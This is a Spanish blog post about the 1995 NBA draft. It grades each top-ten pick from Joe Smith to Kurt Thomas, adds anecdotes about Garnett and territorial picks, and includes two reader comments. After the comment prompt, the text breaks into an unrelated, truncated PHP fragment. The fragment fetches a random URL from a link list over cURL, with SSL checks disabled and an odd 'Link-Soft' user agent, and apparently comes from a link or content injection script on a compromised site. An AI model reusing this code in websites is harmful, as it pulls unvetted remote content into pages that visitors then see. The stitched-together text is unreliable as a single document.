Noches de draft: 1995, el draft de Kevin Garnett

02 de January de 2008 por Jabho

Como os conté en el primer artículo de la serie quiero hacer una lectura de cómo ha influido el azar y el buen ojo para el draft en el devenir de los equipos, además de contar algunas anécdotas más o menos curiosas. A cada elección le asignaré una nota al estilo americano, desde el muy deficiente “F” hasta el sobresaliente “A”.

El draft de 1995 se celebró en Toronto y supuso la primera elección de, los entonces, Vancouver Grizzlies así como de los Toronto Raptors. Fue el draft de Kevin Garnett. The Big Ticket es sin duda el jugador más destacado de este draft y uno de los más destacados en la historia reciente de la NBA. Sin embargo este jugador no fue elegido hasta la posición número 5 ¿Por qué? Garnett fue el primer jugador que fue drafteado directamente desde el instituto, algo que acabó siendo práctica habitual años después pero que se consideró arriesgado entonces. Veamos las elecciones que se dieron en este draft:

Pick 1 – Golden State Warriors: Joe Smith – F

Los Warriors habían sido los quintos por la cola la temporada anterior así que tuvieron a la fortuna de su lado y se llevaron la primera elección. Evidentemente Joe Smith venía con buenos números de su etapa universitaria, pero tras unas 3 primeras temporadas bastante aceptables, su carrera en la NBA ha sido la de un jugador mediocre. Una lista de Sport Illustrated le situaba como el 4º mayor fracaso de la historia del draft. Mejor se hubieran equivocado otros, pensarán en California.

Pick 2 – Los Angeles Clippers: Antonio McDyess – B

Los Clippers habían sido últimos y tuvieron la 2ª elección. Eligieron a McDyess aunque viajó inmediatamente a Denver. Fue una buena elección. Hasta que se lesionó de gravedad en la temporada 2001-02 era una estrella y llegó a disputar incluso el All Star Game de ese año. Después de la lesión, aunque ha tardado un poco, ha reconvertido su juego hasta ser un jugador importante en los actuales Pistons.

Pick 3 – Philadelphia 76ers: Jerry Stackhouse – B

Con el 4º peor registro el año anterior, los Sixers eligieron en tercer lugar. Stackhouse ha sido dos veces All Star y con el paso de los años ha sabido reciclar se juego desde ser la primera opción en ataque a ser un suplente importante en un aspirante al título como Dallas.

Pick 4 – Washington Bullets: Rasheed Wallace – B (+)

Sheed es el mejor jugador del draft tras Garnett. 3 All Stars o el anillo de campeón con Detroit son buena muestra. También ha batido el récord de técnicas en una temporada.

Pick 5 – Minnesota Timberwolves: Kevin Garnett – A

Minnesota tuvo el segundo peor récord y tan sólo la quinta elección. Sin la fortuna de su lado arriesgó en la elección de Garnett y acertó. Garnett ha marcado la historia de la franquicia y cambió la concepción del puesto de ala-pívot. Si consigue el anillo en su nueva etapa en Boston redondeará lo que en cualquier caso será una gran carrera. Minnesota con el pick 1 seguramente no se habría arriesgado.

Pick 6 – Vancouver Grizzlies: Bryant Reeves – E

El primer 7 pies (2.13) del draft. Tras dos buenas primeras campañas firmó una extensión de su contrato por 7 años. Después de una buena tercera campaña llegaron los problemas de sobrepeso y las lesiones que le hicieron retirarse en la temporada 2001-02. Sólo jugó 6 temporadas, todas en Vancouver.

Pick 7 – Toronto Raptors: Damon Stoudamire – D

Fue el Rookie del año de esta promoción y generó grandes expectativas que nunca llegó a cumplir. Aún en activo, en Memphis, su carrera ha ido de más a menos.

Pick 8 – Portland Trail Blazers: Shawn Respert – F

Jugó en los Bucks, Raptors, Mavericks, Suns y en los Lakers hasta el año 2000. Luego emigró a Europa y jugó 2 años más en Italia antes de retirarse. Tuvo una pobre carrera pero en su favor hay que decir que tenía cáncer de estómago y no lo reconoció hasta el año 2005. No quería poner el cáncer como excusa mientras jugaba aunque aparentemente ya lo tenía.

Pick 9 – New Jersey Nets: Ed O’Bannon – F

Tras una breve carrera en la NBA emigró y jugó en varios países (entre ellos Argentina y España) antes de retirarse a los 30. Uno de los grandes errores de este draft.

Pick 10 – Miami Heat: Kurt Thomas – C (+)

Nunca ha sido una estrella, sin embargo ha tenido una buena carrera en la NBA como atestiguan sus 768 partidos hasta la fecha con una media de casi 28 minutos,10 puntos y 7.5 rebotes.

Después de las 10 primeras elecciones siguieron nombres interesantes. Corliss Williamson (mejor 6º hombre en la temporada 2001-2002) fue elegido con el pick 13 por Sacramento. Brent Barry (2 anillos de campeón con los Spurs y el único hombre blanco ganador de un concurso de mates) fue elegido en la posición 15 por los Nuggets. El robo del draft fue Michael Finley, elegido por los Suns en el puesto 21 y que ha participado 2 veces en el All Star Game y ganado un anillo con los Spurs.

Entre otros muchos jugadores cabe destacar a Dejan Bodiroga. Fue elegido en el pick 51 por los Kings y, dado que nunca llegó a ir a la NBA, puede considerarse un acierto de todos los que no lo eligieron. Si hubiera querido ir el acierto habría sido, seguro, de Sacramento por elegirle.

 

Algunos de los jugadores elegibles en el draft 1996: Allen Iverson, Antoine Walker, Erick Dampier, Jermaine O’Neal, Kobe Bryant, Lorenzen Wright, Marcus Camby, Predrag Stojakovic, Ray Allen, Shareef Abdur-Rahim, Stephon Marbury, Steve Nash y Zydrunas Ilgauskas.

La clasificación de aquel año dejaba en los últimos lugares de la liga a:
29 – Grizzilies
28 – 76ers
27 – Raptors
26 – Bucks
25 – Timberwolves
24 – Mavericks
23 – Clippers

Veremos que deparó la lotería y qué tal eligieron los equipos.

Historias del draft:

Kevin Garnett fue el primer jugador que fue drafteado directamente desde el instituto aunque tuvo dos antecedentes diferentes. Moses Malone tampoco pasó por la universidad aunque en su caso el paso fue a la ABA en lugar de la NBA, por lo que nunca fue drafteado según el draft que conocemos. Cuando se disolvió la ABA entró en la NBA tras un draft de dispersión. Shawn Kemp fue a la Universidad de Kentucky tras su paso por el instituto. Estuvo un año en la universidad pero le expulsaron del equipo.

Después de jugar en los Warriors, Joe Smith fue traspasado a los Sixers, quien a su vez lo traspasó al cabo de 30 partidos a los Timberwolves. Como consecuencia de un escándalo relacionado con el límite salarial, que involucró también al ejecutivo del equipo Kevin McHale, Minnesota estuvo varios años sin posibilidades de elección en primera ronda del draft.

En el draft de 1959 Philadelphia se hizo con Wilt Chamberlain gracias a la denominada elección territorial, que permitía a los equipos elegir, antes del draft, a un jugador cuyo instituto no distara más de 50 millas de su terreno de juego, renunciando posteriormente a la primera elección. Esta norma estuvo vigente hasta 1965

Comenta

2 comentarios a esta entrada

  1. Dantley dice:
    #1

    Qué cantidad de nombres que quedaron en nada. Alguno supongo que por temas imposibles de predecir y otros por errores de apreciación.

    El caso de Garnett fue el detonante de que hoy día valga más un jugador de 18 que haya mostrado algo, que un jugador sólido de 21 al que se le supone menos “upside”

    ¿Qué hubiera pasado con Bodiroga? Yo creo que tras Oscar Schmidt Bezerra, no hay otro no-NBA de los últimos 20 años con tantas papeletas de haber triunfado en la NBA

      Citar

  2. MagicJohnson32 dice:
    #2

    Vaya diferencias entre el draft del 95 y el del 96, aunque en este último estaban Dampier y Lorenzen Wright… ¡¡peligro!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>